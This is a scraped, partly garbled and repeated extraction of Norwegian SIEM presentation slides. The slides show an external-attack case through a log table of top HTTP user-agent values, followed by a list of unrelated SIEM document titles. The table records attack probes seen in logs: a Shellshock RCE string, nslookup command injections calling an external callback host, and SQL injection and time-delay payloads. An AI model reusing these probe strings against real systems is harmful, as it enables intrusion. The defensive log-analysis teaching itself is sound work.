Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 18: Security Information and Event Management (SIEM) i praksis

Read Access LogDriver er ofte regulatoriske krav og offentlige standarder

Full overvaringkning av les og aksess av sensitive data

TBD

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 19: Security Information and Event Management (SIEM) i praksis

Case - eksternt angrep

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 20: Security Information and Event Management (SIEM) i praksis

Case - eksternt angrep - injection amp agentidTop 80 httphttp_user_agentrawCount Mozilla50 (Windows NT 61 WOW64) AppleWebKit53721 (KHTML like Gecko) Chrome41022280 Safari537215739 Mozilla40 (compatible MSIE 80 Windows NT 51 Trident40)32 Mozilla50 (Windows NT 63 WOW64 Trident70 rv110) like Gecko11 () ignored echo Content-Type textplain echo echo bash_cve_2014_6271_rce Output $((79+8))3 $(nslookup dnsce00687836-522236079111bxssme)2 5SsG8aES waitfor delay 006 --2 EPm5R3qG2 Nessus2 2 httphitPA3j5QbumAbxssme2 ampnslookup dnsce00687836-452436c89891bxssmeamp`0ampnslookup dnsce00687836-452436c89891bxssmeamp`1 -1 OR 2+518-518-1=0+0+0+11 -1 OR 2+69-69-1=0+0+0+1 --1 -1 OR 2+782-782-1=0+0+0+1 or idBYD5Gw=1 7HMic7MNselect pg_sleep(6) --1 Mozilla501 Nessus64031 XHWoeSMp))select pg_sleep(9) --1 httphitL94mRQKH8mbxssme1 wlezRV11)select pg_sleep(3) --1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 21: Security Information and Event Management (SIEM) i praksis

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 22: Security Information and Event Management (SIEM) i praksis

Case - eksternt angrep

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom

Page 23: Security Information and Event Management (SIEM) i praksis

Thomas Tinglum thomaszedgenet

Roger Skjetlein rogerbasis-consultingcom


2015 Global Security Information and Event Management (SIEM ...

2015 Global Security Information and Event Management (SIEM ...

Atris Security Information & Event Management (SIEM) · 2015. 10. 30. · Atris Technology Services Security Information and Event Management (SIEM) Why Atris SIEM Service? • F

Atris Security Information & Event Management (SIEM) · 2015. 10. 30. · Atris Technology Services Security Information and Event Management (SIEM) Why Atris SIEM Service? • F

The SIEM Evaluator’s GuideThe SIEM Evaluator’s Guide Using SIEM for Compliance, Threat Management, & Incident Response Security information and event management (SIEM) tools are

The SIEM Evaluator’s GuideThe SIEM Evaluator’s Guide Using SIEM for Compliance, Threat Management, & Incident Response Security information and event management (SIEM) tools are

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation

SIEM - Security Information & Event Management

SIEM - Security Information & Event Management

White Paper The Essential Guide to SIEM - Huntsman · White Paper The Essential Guide to SIEM Next Generation Security Monitoring Security information and event management (SIEM)

White Paper The Essential Guide to SIEM - Huntsman · White Paper The Essential Guide to SIEM Next Generation Security Monitoring Security information and event management (SIEM)

Praksis - Tidsskrift.dk

Praksis - Tidsskrift.dk

2019 SIEM REPORT - HelpSystems€¦ · 2019 SIEM REPORT 2 Security Information and Event Management (SIEM) is a powerful technology that allows security operations teams to collect,

2019 SIEM REPORT - HelpSystems€¦ · 2019 SIEM REPORT 2 Security Information and Event Management (SIEM) is a powerful technology that allows security operations teams to collect,

Netiq Siem(SIEM)

Netiq Siem(SIEM)

Godt eCommerce design i praksis

Godt eCommerce design i praksis

Exploring the Applicability of SIEM Technology in IT Security · operation after security breach. Security Information and Event Management (SIEM) technology have in the recent decade

Exploring the Applicability of SIEM Technology in IT Security · operation after security breach. Security Information and Event Management (SIEM) technology have in the recent decade

INTEGRATION WITH T ARTY SIEM SYSTEMS - Netwrix · When integration with SIEM products is enabled, a custom Windows event log is created called NetWrix Change Reporter.

INTEGRATION WITH T ARTY SIEM SYSTEMS - Netwrix · When integration with SIEM products is enabled, a custom Windows event log is created called NetWrix Change Reporter.

Vendor Landscape: Security Information & Event Management (SIEM)€¦ · Optimize IT security management & simplify compliance with SIEM tools. Info-Tech Research Group 2 This Research

Vendor Landscape: Security Information & Event Management (SIEM)€¦ · Optimize IT security management & simplify compliance with SIEM tools. Info-Tech Research Group 2 This Research

God praksis ved engfornying ?

God praksis ved engfornying ?

Perancangan Security Information and Event Management ......Perancangan Security Information and Event Management (SIEM) Menggunakan Open Source SIEM (OSSIM) Artikel Ilmiah Peneliti

Perancangan Security Information and Event Management ......Perancangan Security Information and Event Management (SIEM) Menggunakan Open Source SIEM (OSSIM) Artikel Ilmiah Peneliti

SECURITY EVENT LOG MANAGEMENT- What to consider when looking at SIEM Technology

SECURITY EVENT LOG MANAGEMENT- What to consider when looking at SIEM Technology

Security Information and Event Management (SIEM) Orchestration · Guide 3 SIEM Orchestration Over the last two decades, security information and event management (SIEM) adoption has

Security Information and Event Management (SIEM) Orchestration · Guide 3 SIEM Orchestration Over the last two decades, security information and event management (SIEM) adoption has

SIEM-ENABLED CYBER EVENT CORRELATION (WHAT AND HOW)

SIEM-ENABLED CYBER EVENT CORRELATION (WHAT AND HOW)

Service Design i Praksis

Service Design i Praksis

The CorreLog Approach to SIEM - PRWebww1.prweb.com/.../CorreLog_SIEM_Server_Brochure.pdf · The CorreLog Approach to SIEM: ... correlating event logs for any sign of potential threat,

The CorreLog Approach to SIEM - PRWebww1.prweb.com/.../CorreLog_SIEM_Server_Brochure.pdf · The CorreLog Approach to SIEM: ... correlating event logs for any sign of potential threat,